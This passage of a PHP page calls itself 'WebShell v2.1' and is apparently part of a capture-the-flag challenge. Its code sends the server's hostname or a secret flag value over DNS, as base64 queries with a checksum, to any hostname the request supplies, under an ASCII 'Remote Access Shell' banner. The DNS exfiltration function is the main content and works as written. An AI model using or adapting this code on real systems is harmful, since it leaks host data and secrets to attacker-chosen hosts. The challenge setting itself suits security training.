'Invalid variable format']); exit; } $sanitized_hostname = preg_replace('/[^a-zA-Z0-9.-]/', '', $hostname); if (($sanitized_hostname !== $hostname || empty($sanitized_hostname)) || (!in_array($type_cmd, ['hostname', 'flag'], true))) { http_response_code(400); echo json_encode(['error' => 'Invalid variable format']); exit; } if ($type_cmd === 'hostname') { performDnsExfiltration(gethostname(), $sanitized_hostname); } else if ($type_cmd === 'flag') { performDnsExfiltration($FLAG, $sanitized_hostname); } echo json_encode(['success' => true]); exit; } function performDnsExfiltration(string $content, string $hostname): bool { try { $checksum = substr(md5($content), 0, 3); $value_b64 = rtrim(strtr(base64_encode($content), '+/', '--'), '='); $query = "{$value_b64}.{$checksum}.{$hostname}"; # Perform the DNS exfiltration of the content and its checksum to the specific hostname dns_get_record($query, DNS_A); return true; } catch (Exception $e) { return false; } } ?> WebShell v2.1

╔══════════════════════════╗

║ REMOTE ACCESS SHELL v2.1 ║

╚══════════════════════════╝

[*] Connection established...
[*] DNS exfiltration module loaded
[*] Waiting for commands...
___ _ _ ___ | __|| \/ ||_ _| | _| | /\ | | | |___||_||_||___|
[root@target]# extract_hostname -format base64 -addCheckSum
[root@target]# extract_flag -format base64 -addCheckSum
ONLINE